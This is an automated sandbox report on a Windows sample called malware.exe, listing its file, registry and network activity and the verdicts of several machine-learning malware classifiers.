29/2/2020 - 1:46:51.622Read1480C:\malware.exeC:\Users\Behemot\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\BE8B021F9E811DFC8C8A28572A17C05A_EE6FD365CEA70AC1381BEED92EFF2B2DBE8B021F9E811DFC8C8A28572A17C05A_EE6FD365CEA70AC1381BEED92EFF2B2D
29/2/2020 - 1:46:51.622Read1480C:\malware.exeC:\Users\Behemot\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\BE8B021F9E811DFC8C8A28572A17C05A_EE6FD365CEA70AC1381BEED92EFF2B2DBE8B021F9E811DFC8C8A28572A17C05A_EE6FD365CEA70AC1381BEED92EFF2B2D
29/2/2020 - 1:46:51.622Write1480C:\malware.exeC:\Users\Behemot\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\BE8B021F9E811DFC8C8A28572A17C05A_EE6FD365CEA70AC1381BEED92EFF2B2DBE8B021F9E811DFC8C8A28572A17C05A_EE6FD365CEA70AC1381BEED92EFF2B2D
29/2/2020 - 1:46:51.622Write1480C:\malware.exeC:\Users\Behemot\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\BE8B021F9E811DFC8C8A28572A17C05A_EE6FD365CEA70AC1381BEED92EFF2B2DBE8B021F9E811DFC8C8A28572A17C05A_EE6FD365CEA70AC1381BEED92EFF2B2D
29/2/2020 - 1:46:51.622Unknown1480C:\malware.exeC:\Users\Behemot\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\BE8B021F9E811DFC8C8A28572A17C05A_EE6FD365CEA70AC1381BEED92EFF2B2DBE8B021F9E811DFC8C8A28572A17C05A_EE6FD365CEA70AC1381BEED92EFF2B2D
29/2/2020 - 1:46:51.622Unknown1480C:\malware.exeC:\Users\Behemot\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\BE8B021F9E811DFC8C8A28572A17C05A_EE6FD365CEA70AC1381BEED92EFF2B2DBE8B021F9E811DFC8C8A28572A17C05A_EE6FD365CEA70AC1381BEED92EFF2B2D
29/2/2020 - 1:46:51.622Unknown1480C:\malware.exeC:\Users\Behemot\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\BE8B021F9E811DFC8C8A28572A17C05A_EE6FD365CEA70AC1381BEED92EFF2B2DBE8B021F9E811DFC8C8A28572A17C05A_EE6FD365CEA70AC1381BEED92EFF2B2D

Process
Trace

Analysis
Reason
Timeout

Status
Successfully Executed

Results
1

Registry
Trace
29/2/2020 - 1:45:46.137Write1480C:\malware.exeHKCU\Local Settings\MuiCache\5\96383CDBLanguageList
29/2/2020 - 1:45:46.137Write1480C:\malware.exeHKCU\Local Settings\MuiCache\5\96383CDBLanguageList
29/2/2020 - 1:45:46.137Write1480C:\malware.exeHKCU\Local Settings\MuiCache\5\96383CDBLanguageList
29/2/2020 - 1:45:46.137Write1480C:\malware.exeHKCU\Local Settings\MuiCache\5\96383CDBLanguageList
29/2/2020 - 1:45:46.137Write1480C:\malware.exeHKCU\Local Settings\MuiCache\5\96383CDBLanguageList
29/2/2020 - 1:46:2.825Write1480C:\malware.exeHKCU\Software\Microsoft\GDIPlusFontCachePath
29/2/2020 - 1:46:49.12Write1480C:\malware.exeHKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMapProxyBypass
29/2/2020 - 1:46:49.12Write1480C:\malware.exeHKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMapIntranetName
29/2/2020 - 1:46:49.12Write1480C:\malware.exeHKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMapUNCAsIntranet
29/2/2020 - 1:46:49.12Write1480C:\malware.exeHKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMapAutoDetect
29/2/2020 - 1:46:49.12Write1480C:\malware.exeHKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMapProxyBypass
29/2/2020 - 1:46:49.12Write1480C:\malware.exeHKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMapIntranetName
29/2/2020 - 1:46:49.12Write1480C:\malware.exeHKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMapUNCAsIntranet
29/2/2020 - 1:46:49.12Write1480C:\malware.exeHKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMapAutoDetect
29/2/2020 - 1:46:49.122Write1480C:\malware.exeHKCU\Software\Microsoft\Windows\CurrentVersion\Internet SettingsProxyEnable
29/2/2020 - 1:46:49.122Delete1480C:\malware.exeHKCU\Software\Microsoft\Windows\CurrentVersion\Internet SettingsProxyServer
29/2/2020 - 1:46:49.122Delete1480C:\malware.exeHKCU\Software\Microsoft\Windows\CurrentVersion\Internet SettingsProxyOverride
29/2/2020 - 1:46:49.122Delete1480C:\malware.exeHKCU\Software\Microsoft\Windows\CurrentVersion\Internet SettingsAutoConfigURL
29/2/2020 - 1:46:49.122Delete1480C:\malware.exeHKCU\Software\Microsoft\Windows\CurrentVersion\Internet SettingsAutoDetect
29/2/2020 - 1:46:49.122Write1480C:\malware.exeHKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ConnectionsSavedLegacySettings
29/2/2020 - 1:46:49.215Write1480C:\malware.exeHKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\ContentCachePrefix
29/2/2020 - 1:46:49.215Write1480C:\malware.exeHKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\CookiesCachePrefix
29/2/2020 - 1:46:49.215Write1480C:\malware.exeHKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\HistoryCachePrefix
29/2/2020 - 1:46:49.434Write1480C:\malware.exeHKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\52-54-00-83-08-f3WpadDecisionReason
29/2/2020 - 1:46:49.434Write1480C:\malware.exeHKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\52-54-00-83-08-f3WpadDecisionTime

File Summary
Created
Identified: True

Deleted
Identified: False

Process Summary
Created
Identified: False

Deleted
Identified: False

Registry Summary
Proxy
Identified: False

AutoRun
Identified: False

Created
Identified: True

Deleted
Identified: True

Browsers
Identified: False

Internet
Identified: True


DNS
Query
localhost -> gateway:50273 www.google.com.
localhost -> gateway:DNS ocsp.pki.goog.
localhost -> gateway:DNS www.google.com.

Response
gateway:DNS -> localhost www.google.com. 172.217.30.100
gateway:DNS -> localhost ocsp.pki.goog. 216.58.202.163

TCP
Info
localhost:65192 -> 172.217.30.100:443
216.58.202.163:80 -> localhost:65193
localhost:65191 -> 172.217.30.100:80
172.217.30.100:443 -> localhost:65192
172.217.30.100:80 -> localhost:65191
localhost:65193 -> 216.58.202.163:80

UDP
Info
localhost:55394 -> localhost:53
localhost:50273 -> localhost:53
localhost:53 -> localhost:50273
localhost:53 -> localhost:55394
localhost:67 -> localhost:68
localhost:68 -> 255.255.255.255:67

HTTP
Info
localhost GET ocsp.pki.goog /gts1o1/MFIwUDBOMEwwSjAJBgUrDgMCGgUABBRCRjDCJxnb3nDwj%2Fxz5aZfZjgXvAQUmNH4bhDrz5vsYJ8YkBug630J%2FSsCEQDvdxhhS3x8DggAAAAALnGY
localhost GET www.google.com /
localhost GET ocsp.pki.goog /gsr2/ME4wTDBKMEgwRjAJBgUrDgMCGgUABBTgXIsxbvr2lBkPpoIEVRE6gHlCnAQUm%2BIHV2ccHsBqBt5ZtJot39wZhi4CDQHjtJqhjYqpgSVpULg%3D

Summary
DNS
True

TCP
True

UDP
True

HTTP
True

Results
BINARY
KNN (K=3, NFS-BRMalware)
confidence: 66.67%
suspicious: False

Decision Tree (NFS-BRMalware)
confidence: 100.00%
suspicious: False

SVC (Kernel=Linear, NFS-BRMalware)
confidence: 72.95%
suspicious: False

MalConv (Ember: Raw Bytes, Threshold=0.5)
confidence: 80.96%
suspicious: True

Random Forest (100 estimators, NFS-BRMalware)
confidence: 52.00%
suspicious: False

Non-Negative MalConv (Ember: Raw Bytes, Threshold=0.35)
confidence: 74.41%
suspicious: False

LightGBM (Ember: File Characteristics, Threshold=0.8336)
confidence: 99.99%
suspicious: True
